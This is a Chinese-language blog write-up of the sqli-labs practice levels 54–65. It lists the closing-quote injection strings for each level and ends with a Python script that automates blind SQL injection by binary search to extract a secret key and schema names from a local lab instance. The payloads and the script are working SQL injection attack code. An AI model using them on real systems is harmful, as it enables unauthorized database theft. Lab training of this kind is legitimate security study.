sqli-labs(54-65)终章
Page4終章以为会很难,结果就是限定注入次数,其他和前面一样,虽然很接近现实注入,但是还是可以采取一些手段来‘无限’注入,比如代理,脚本等。。。
Less-54~57
这4关都是使用联合查询注入,so easy。。。
Less-54
闭合方式:id=1'--+
Less-55
闭合方式:id=1)--+
Less-56
闭合方式:id=1')--+
Less-57
闭合方式:id="--+
Less-58~61
这4关都是使用报错型注入,,,,
Less-58
闭合方式:id=1'--+
Less-59
闭合方式:id=1--+
Less-60
闭合方式:id=1')--+
Less-61
闭合方式:id=1'))--+
Less-62~65
这4都是盲注,写写脚本就好了,,,
Less-62
闭合方式:id=1')--+
Less-63
闭合方式:id=1'--+
Less-64
闭合方式:id=1))--+
Less-65
闭合方式:id=1")--+
还是写了个脚本,前面都可以用的,
import requests
import sys
def u(index,asc):url_start='http://127.0.0.1/sqli-labs/Less-65/?id=1")and'url_end='--+'url_select='(ascii(mid((select group_concat(secret_AO2C)from challenges.LMFZWPHL9J'+'),'+str(index)+',1))>'+str(asc)+')'# 这里的表名和字段名都是会变化的,根据自己跑出来的结果更改,跑key##url_select='(ascii(mid((select group_concat(schema_name)from information_schema.schemata'+'),'+str(index)+',1))>'+str(asc)+')'//跑库##url_select='(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema='+"'challenges'"+'),'+str(index)+',1))>'+str(asc)+')'//跑表名##url_select='(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema='+"'challenges'and table_name='LMFZWPHL9J'"+'),'+str(index)+',1))>'+str(asc)+')'//跑字段url=url_start+url_select+url_endreturn url
def url(index,asc):re=requests.get(url=u(index,asc)).textif 'Angelina' in re:return Trueelse:return False
def dff(index,left,right)://二分法判断while left<right:asc=int((left+right)/2)if url(index,asc):left=ascelse:right=ascif left+1==right:if url(index,left):return rightelse:return left
if __name__=="__main__":for index in range(1024):ord1=dff(index,30,126)if ord1==31:breaksys.stdout.write(chr(ord1))sys.stdout.flush()sys.stdout.write("\r\n")sys.stdout.flush()sqli-labs完结。
sqli-labs(54-65)终章相关推荐
- 【高校宿舍管理系统】终章 完成主页以及项目总结
终章 完成主页以及项目总结 提示:本博客个为人独立博客,不是权威,仅供参考!所有思路只做交流之用!如有不足之处,望各位在评论区友善指正. 文章目录 终章 完成主页以及项目总结 前言 一.完成主页 1. ...
- SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi LABS Less 26a 联合注入+布尔盲注
第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- 终章 - 软件工程实践总结作业
终章 - 软件工程实践总结作业 一.请回望暑假时的第一次作业,你对于软件工程课程的想象 当时正值酷暑,快开学了,在家里也是无所事事,就花费了一些心思写下了那份第一次作业.现在看来,当时的想象还是蛮符合 ...
- 纪中暑假培训 :Date:7 终章-剑之魂
[NOIP2015模拟10.28B组]终章-剑之魂 (File IO): input:sword.in output:sword.out Time Limits: 1000 ms Memory Lim ...
- Linux 小程序开发日记(终章)(pyqt+yolov5)
Linux 小程序开发日记(终章) 哈喽大家好,我是爱喝欢乐水的柳橙汁,这一篇,是最后一篇啦.我会将所有个过程都梳理一遍. 关于代码的详细注释,大家就参考一下之前的笔记吧.这一篇博客我就放上我精简的代 ...
- UFS详细介绍---终章
UFS详细介绍-终章 UNIVERSAL FLASH STORAGE (UFS),通用闪存存储器.目前最新的标准是UFS4.0:UFS的出现是因为替代eMMC产品的,但是因为价格等,目前没办法做到完全 ...
- 从零开始自制实现WebServer(十八)---- 对服务器做最后的压力测试 WebBench压测小工具 项目迎来终章
文章目录 全流程实现博客链接 前引 (十八)---- 对服务器做最后的压力测试 WebBench压测小工具 项目迎来终章 1.正确处理Vmware-Station 处理器设置(初步调试过程) 2.正确 ...
最新文章
- Windows Server 2016 DNS Policy Geo-Location 1
- DV录像带导出一定要用1394
- copy of an AVPacket structure
- php发送短信验证码
- Eclipse下配置struts很让我痛苦
- php清空html_php怎么清除html代码
- mbsfn子帧_区分小区内子帧状态的方法、装置以及系统_2008100004878_说明书_专利查询_专利网_钻瓜专利网...
- ps导出gif颜色不对_PS基础知识(1)
- druid连接池mysql自动关闭_探究Druid连接池“违反协议”异常
- CTF之Web训练后篇2
- 【裴礼文数学分析】例1.1.1
- Windows快捷键PrtSc截图无法正常使用
- mac android 手机连接打印机,为什么苹果电脑连接打印机打不出来怎么办
- html单元格点击变色,当我将鼠标悬停在html表格上时,更改单元格的颜色
- Runloop与UITableView简单结合
- 离开谷歌回归斯坦福,“AI女神”李飞飞新动向揭晓
- c语言2维数组每一行最小值,二维数组每一行最大值
- 简化ETL工作,编写一个Canal胶水层
- vue项目怎么样去实现新窗口跳转_vue跳转方式(打开新页面)及传参操作示例
- 海康威视sdk错误码大全